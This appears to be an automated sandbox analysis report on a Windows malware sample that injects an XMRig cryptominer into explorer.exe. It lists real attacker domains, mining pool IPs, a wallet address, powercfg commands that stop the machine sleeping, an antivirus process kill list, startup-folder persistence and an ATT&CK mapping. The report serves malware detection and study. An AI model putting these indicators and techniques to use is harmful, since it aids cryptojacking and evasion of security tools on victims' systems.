                  Source: explorer.exe, 00000015.00000003.2057580739.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":60,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":
                  Source: explorer.exe, 00000015.00000002.2907055074.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\USER\S-1-5-21-2246122658-3693405117-2476756634-1003_Classes\Interface\{423EC01E-2E35-11D2-B604-00104B703EFD}\ProxyStubClsid32er.exe - Program Manager","runtime":60,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":&
                  Source: explorer.exe, 00000015.00000003.2057580739.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":60,"type":"xmrig","pool":"185.157.162.216","port":4444,"algo":"rx/0","worker":"","password":"","user":"46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB","hashrate":2.2471910112359548,"status":2}
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"932923","username":"932923","gpu":"T25DDH","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":4,"type":"xmrig","status":1}
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeQueries volume information: C:\Users\user\Desktop\ZppxPm0ASs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\IsStopped.exeQueries volume information: C:\Users\user\AppData\Roaming\IsStopped.exe VolumeInformation
                  Source: C:\Users\user\Desktop\ZppxPm0ASs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Modifies power options to not sleep / hibernate
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashdisp.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bullguard.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dwengine.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: k7tsmngr.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbamsvc.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgnsx.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savservice.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a2service.exe
                  Source: explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fsma32.exe

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts11
                  Windows Management Instrumentation                  		111
                  Scripting                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Disable or Modify Tools                  		OS Credential Dumping1
                  File and Directory Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		LSASS Memory13
                  System Information Discovery                  		Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Windows Service                  		1
                  Abuse Elevation Control Mechanism                  		Security Account Manager321
                  Security Software Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  PowerShell                  		2
                  Registry Run Keys / Startup Folder                  		512
                  Process Injection                  		1
                  Obfuscated Files or Information                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                  Registry Run Keys / Startup Folder                  		1
                  Software Packing                  		LSA Secrets151
                  Virtualization/Sandbox Evasion                  		SSHKeylogging4
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job151
                  Virtualization/Sandbox Evasion                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
                  Process Injection                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576051 Sample: ZppxPm0ASs.exe Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 75 woo097878781.win 2->75 77 pool.hashvault.pro 2->77 85 Suricata IDS alerts for network traffic 2->85 87 Antivirus / Scanner detection for submitted sample 2->87 89 Multi AV Scanner detection for submitted file 2->89 91 10 other signatures 2->91 11 ZppxPm0ASs.exe 14 6 2->11         started        16 wscript.exe 1 2->16         started        signatures3 process4 dnsIp5 83 woo097878781.win 154.216.20.243, 443, 49700, 49722 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 11->83 69 C:\Users\user\AppData\Roaming\IsStopped.exe, PE32+ 11->69 dropped 71 C:\Users\user\AppData\...\IsStopped.vbs, ASCII 11->71 dropped 73 C:\Users\...\IsStopped.exe:Zone.Identifier, ASCII 11->73 dropped 119 Drops VBS files to the startup folder 11->119 121 Encrypted powershell cmdline option found 11->121 123 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->123 127 4 other signatures 11->127 18 RegAsm.exe 1 11->18         started        22 powershell.exe 22 11->22         started        125 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->125 24 IsStopped.exe 16->24         started        file6 signatures7 process8 file9 67 C:\Users\user\AppData\...\lkpwsyczzfuj.sys, PE32+ 18->67 dropped 93 Injects code into the Windows Explorer (explorer.exe) 18->93 95 Uses powercfg.exe to modify the power settings 18->95 97 Modifies the context of a thread in another process (thread injection) 18->97 107 2 other signatures 18->107 26 explorer.exe 18->26         started        30 powercfg.exe 1 18->30         started        32 powercfg.exe 1 18->32         started        38 2 other processes 18->38 99 Loading BitLocker PowerShell Module 22->99 34 WmiPrvSE.exe 22->34         started        36 conhost.exe 22->36         started        101 Antivirus detection for dropped file 24->101 103 Multi AV Scanner detection for dropped file 24->103 105 Machine Learning detection for dropped file 24->105 109 4 other signatures 24->109 signatures10 process11 dnsIp12 79 185.157.162.216, 4444, 49734 OBE-EUROPEObenetworkEuropeSE Sweden 26->79 81 pool.hashvault.pro 5.188.137.200, 3333, 49720 SELECTEL-MSKRU Russian Federation 26->81 113 System process connects to network (likely due to code injection or exploit) 26->113 115 Query firmware table information (likely to detect VMs) 26->115 117 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 26->117 40 RegAsm.exe 26->40         started        43 conhost.exe 30->43         started        45 conhost.exe 32->45         started        47 conhost.exe 38->47         started        49 conhost.exe 38->49         started        signatures13 process14 signatures15 111 Modifies power options to not sleep / hibernate 40->111 51 powercfg.exe 40->51         started        53 powercfg.exe 40->53         started        55 powercfg.exe 40->55         started        57 powercfg.exe 40->57         started        process16 process17 59 conhost.exe 51->59         started        61 conhost.exe 53->61         started        63 conhost.exe 55->63         started        65 conhost.exe 57->65         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  ZppxPm0ASs.exe29%ReversingLabsWin64.Trojan.Jalapeno
                  ZppxPm0ASs.exe100%AviraHEUR/AGEN.1304644
                  ZppxPm0ASs.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\IsStopped.exe100%AviraHEUR/AGEN.1304644
                  C:\Users\user\AppData\Roaming\IsStopped.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys5%ReversingLabs
                  C:\Users\user\AppData\Roaming\IsStopped.exe29%ReversingLabsWin64.Trojan.Jalapeno

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://woo097878781.win0%Avira URL Cloudsafe
                  https://woo097878781.win/66/api/endpoint.phpds0%Avira URL Cloudsafe
                  https://woo097878781.win/77/uploads/Odavmyskfc.pdf0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txteC:0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txt00%Avira URL Cloudsafe
                  http://www.microsoft.coE0%Avira URL Cloudsafe
                  https://woo097878781.win/66/api/endpoint.phpEZ0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txtTEM0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txt0%Avira URL Cloudsafe
                  https://woo097878781.win/66/api/endpoint.php--cinit-version=3.4.1--nicehash--tls--cinit-idle-wait=5-0%Avira URL Cloudsafe
                  http://www.microsoft.U~0%Avira URL Cloudsafe
                  https://woo097878781.win/66/api/endpoint.phptjalvjhtgxjbffgq0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txtC:0%Avira URL Cloudsafe
                  http://crl.m:B0%Avira URL Cloudsafe
                  https://woo097878781.win/P.txt--cinit-kill-targets=msmpeng.exe0%Avira URL Cloudsafe
                  https://woo097878781.win/66/api/endpoint.php$0%Avira URL Cloudsafe
                  http://www.microsoft.Y0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pool.hashvault.pro
                  		5.188.137.200
                  		truefalse
                    		high
                    woo097878781.win
                    		154.216.20.243
                    		truefalse
                      		high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://woo097878781.win/77/uploads/Odavmyskfc.pdftrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://woo097878781.win/66/api/endpoint.phpfalse
                        		high
                        https://woo097878781.win/P.txttrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.microsoft.coEpowershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354ZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1449279227.000001FDD9F41000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1762727004.0000016D01AB1000.00000004.00000800.00020000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://woo097878781.win/P.txt0explorer.exe, 00000015.00000003.1488436728.000000000135D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2907055074.0000000001360000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.1467738903.0000000001369000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000003.2057009990.0000000001360000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1408857314.0000022246DC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/Iconpowershell.exe, 00000008.00000002.1432829442.0000022256C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/mgravell/protobuf-netZppxPm0ASs.exe, 00000000.00000002.1482651913.000001FDEA455000.00000004.00000800.00020000.00000000.sdmp, ZppxPm0ASs.exe, 00000000.00000002.1447439189.000001FDD9E10000.00000004.08000000.00040000.00000000.sdmp, IsStopped.exe, 00000017.00000002.1911085793.0000016D11EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.microsoft.powershell.exe, 00000008.00000002.1453345407.000002225ED46000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
